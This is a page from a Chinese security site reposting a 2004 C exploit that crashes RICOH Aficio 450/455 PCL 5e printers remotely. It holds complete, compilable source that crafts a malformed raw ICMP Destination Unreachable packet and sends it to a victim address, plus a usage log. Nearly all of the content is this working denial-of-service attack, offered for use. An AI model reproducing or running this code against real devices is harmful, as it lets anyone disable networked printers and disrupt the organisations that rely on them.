首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
RICOH Aficio 450/455 PCL 5e Printer ICMP Remote DoS Exploit
来源:www.chollian.net/~jyj9782 作者:x90c 发布时间:2004-12-17  

RICOH Aficio 450/455 PCL 5e Printer ICMP Remote DoS Exploit

/*
* RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit.
* DATE: 12.15.2004
* Vuln Advisory : Hongzhen Zhou<felix__zhou _at_ hotmail _dot_ com>
* Exploit Writer : x90c(Kyong Joo)@www.chollian.net/~jyj9782
*
* Testing -----------------------------------------------
* root@testbed:~/raw# gcc -o rpcl_icmpdos rpcl_icmpdos.c
* root@testbed:~/raw# ./rpcl_icmpdos
* Usage: ./rpcl_icmpdos <victim>
* root@testbed:~/raw# ./rpcl_icmpdos 192.168.2.4
* exploit sent ok() = ..x-_-x..
* root@testbed:~/raw#
*
*/

#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<linux/ip.h>
#include<linux/icmp.h>

unsigned short cksum(unsigned short *buf, int len);

struct icmp_packet{
struct icmphdr icmp;
struct iphdr inip;
unsigned char bigger[90]; // STEP1: Bigger Data(ICMP Header(8)+ inip(20) + 90(bigger
data))
} packet;


/* ########################
* # Entry Point #
* ########################
*/

int main(int argc, char *argv[]){
struct sockaddr_in ca;
int sockfd, ret;

if(argc<2){
printf("Usage: %s <victim>\n", argv[0]);
exit(-1);
}

sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);

memset(&packet, 0, sizeof(packet));

packet.icmp.type = 3; // STEP2: Destination Unreachable.
packet.icmp.code = 1;
packet.icmp.un.echo.id = getpid();
packet.icmp.un.echo.sequence = 0;

packet.inip.ihl = 5;
packet.inip.version = 4;
packet.inip.tot_len = htons(20);
packet.inip.id = htons(9090);
packet.inip.ttl = 90;
packet.inip.protocol = IPPROTO_TCP; // STEP3: IPPROTO_UDP also useable.
packet.inip.saddr = inet_addr("127.0.0.1");
packet.inip.daddr = inet_addr("127.0.0.1");
packet.inip.check = (unsigned short) cksum((unsigned short *)&packet.inip, 20);

packet.icmp.checksum = cksum((void *)&packet, sizeof(packet));

memset(&ca, 0, sizeof(ca));
ca.sin_family = AF_INET;
ca.sin_addr.s_addr = inet_addr(argv[1]);


if((sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&ca, sizeof(ca)))
== sizeof(packet))
printf("exploit sent ok() = ..x-_-x..\n");
else
printf("exploit sent failed() = ..o^O^o..\n");


close(sockfd);

}


/* ########################
* # Internet Checksum #
* ########################
*/

unsigned short cksum(unsigned short *buf, int len){
register unsigned long sum;

for(sum = 0; len > 0; len--) sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Codename Eagle <= 1.42 sock
·Linux kernel 2.4 and 2.6 Multi
·Carsten's 3D Engine Format Str
·Ability FTPd v2.34 Remote Comm
·Chaser Nickname Buffer Overflo
·WinRAR <= 3.41 Compressed F
·Xpand Rally Format String Vuln
·phpBB 2.x and PHP 4.3.9 unseri
·SocialMPN Arbitrary File Injec
·Linux Kernel <= 2.6.9, <
·Ethereal 3G Remote Buffer Over
·Linux Kernel <= 2.6.9, <
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved